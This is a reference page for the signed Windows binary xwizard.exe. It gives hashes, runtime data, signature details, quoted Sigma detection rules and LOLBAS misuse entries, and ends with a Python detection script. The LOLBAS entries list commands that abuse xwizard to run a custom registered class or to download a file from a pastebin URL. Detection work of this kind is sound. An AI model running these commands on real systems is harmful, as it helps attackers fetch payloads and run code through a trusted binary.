xwizard.exe

  • File Path: C:\Windows\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 30C784340F42DB44A84C7958C240E394
SHA1 A9611D90310FE54D0F78E7E067B00C9D53C870C3
SHA256 4359C82A6760D717EC367BC80B1A70E149BF7E197EA45C1188A4826570B96C50
SHA384 A339A0099D201304612ADBACC84D0E81132C0BB3CC73A7D6A7F8764CCD661AFA04390F98C922E310CAFFB3C0A9CD6CC1
SHA512 F5F7DA6505DFDE7060EC0FB186915F4390EB1D0A3048EFFC65DF41B9B6201E501BE1AD6CB3DB8F626451FD3FDFAF5EF9D615200B7D039F79E93EF74E4A359D8E
SSDEEP 1536:Q6/9faJbkDGuJjMVxMckeR1Ea/0z/v7SIiuIJcURDoq4OZZZLlCIib:Q6/9CJbUGuJjYM57CuIJ9RD68wb
IMP 42465F712C75BD79EB46ECE0D31A4B8D
PESHA1 8C6D1387B27148E3DD998ED4B79D7A87CDCED1E1
PE256 86F45225EDBB0758C7B7ADCDB80F6021DF4761538423387E08A024113240F9CD

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\xwizard.exe.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_ca04af081b815d21 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\System32\combase.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\system32\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 330000026551AE1BBD005CBFBD000000000265
  • Thumbprint: E168609353F30FF2373157B4EB8CD519D07A2BFF
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/4359c82a6760d717ec367bc80b1a70e149bf7e197ea45c1188a4826570b96c50/detection

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 46
C:\WINDOWS\system32\ComputerDefaults.exe 40
C:\WINDOWS\system32\ComputerDefaults.exe 41
C:\Windows\system32\ComputerDefaults.exe 46
C:\windows\system32\ComputerDefaults.exe 47
C:\Windows\system32\ComputerDefaults.exe 46
C:\Windows\system32\xwizard.exe 44
C:\windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 41
C:\WINDOWS\system32\xwizard.exe 43
C:\Windows\system32\xwizard.exe 47
C:\windows\SysWOW64\ComputerDefaults.exe 49
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 44
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 33
C:\Windows\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 44
C:\WINDOWS\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 46
C:\windows\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 47
C:\WINDOWS\SysWOW64\xwizard.exe 47

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which are utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switches prevent an error message in later Windows 10 builds.
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe
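The three abuse patterns in the table above (a non-default image path that enables xwizards.dll sideloading, RunWizard with a custom CLSID, and the /z URL of the RemoteApp wizard) map directly onto process-creation telemetry. The following is an added example written for this page, not code from Strontic, the Sigma project or LOLBAS: it reconstructs the checks the rule descriptions imply and runs them over constructed Sysmon-style events. The default image paths and the pastebin URL come from the table; the known-CLSID allowlist, the event field names (Image, CommandLine) and the severities are assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Default install paths of the signed binary, per the LOLBAS paths in the table.
DEFAULT_IMAGE_PATHS = {
    r"c:\windows\system32\xwizard.exe",
    r"c:\windows\syswow64\xwizard.exe",
}

# Wizard CLSIDs treated as expected. Only the RemoteApp and Desktop Connections
# wizard CLSID from the table is listed; a real baseline would be larger (assumption).
KNOWN_WIZARD_CLSIDS = {
    "{7940acf8-60ba-4213-a7c3-f3b400ee266d}",
}

CLSID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)
RUNWIZARD_RE = re.compile(r"\bRunWizard\b", re.I)
# In the LOLBAS example the URL is glued to /z with no space; accept either form.
ZURL_RE = re.compile(r"/z\s*(https?://\S+)", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


def analyze_event(event: dict) -> list[Finding]:
    """Apply the xwizard.exe checks to one process-creation event (Sysmon EID 1 field names)."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    findings: list[Finding] = []

    if not image.lower().endswith("\\xwizard.exe"):
        return findings  # not the binary this hunt is about

    # Sideloading: the signed binary copied next to an attacker-supplied xwizards.dll.
    if image.lower() not in DEFAULT_IMAGE_PATHS:
        findings.append(Finding("xwizard_dll_sideload", "high",
                                f"xwizard.exe executed from non-default path {image}"))

    # Custom class execution: RunWizard with a CLSID argument. Unknown CLSIDs rank higher.
    if RUNWIZARD_RE.search(cmdline):
        for clsid in CLSID_RE.findall(cmdline):
            sev = "low" if clsid.lower() in KNOWN_WIZARD_CLSIDS else "medium"
            findings.append(Finding("xwizard_class_exec", sev, f"RunWizard {clsid}"))

    # Download through the RemoteApp wizard: /z<url>.
    m = ZURL_RE.search(cmdline)
    if m:
        findings.append(Finding("xwizard_remote_download", "high", f"/z URL {m.group(1)}"))

    return findings


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Return {event index: [rule names]} for every event that produced a finding."""
    hits: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        rules = [f.rule for f in analyze_event(ev)]
        if rules:
            hits[i] = rules
    return hits


# Constructed sample events; command lines follow the LOLBAS entries in the table.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\xwizard.exe",
     "CommandLine": "xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d}"},
    {"Image": r"C:\Windows\System32\xwizard.exe",
     "CommandLine": "xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}"},
    {"Image": r"C:\Windows\SysWOW64\xwizard.exe",
     "CommandLine": "xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} "
                    "/zhttps://pastebin.com/raw/iLxUT5gM"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\xwizard.exe",
     "CommandLine": r"C:\Users\user\AppData\Local\Temp\xwizard.exe RunWizard "
                    "{00000001-0000-0000-0000-0000FEEDACDC}"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d}"},
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", rules)
```

The class-execution check fires on any RunWizard CLSID, as the Sigma rule does, so in production it should be scoped by the allowlist and by parent process; the sideload and /z checks are low-noise on their own and are the ones worth alerting on directly.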

MIT License. Copyright (c) 2020-2021 Strontic.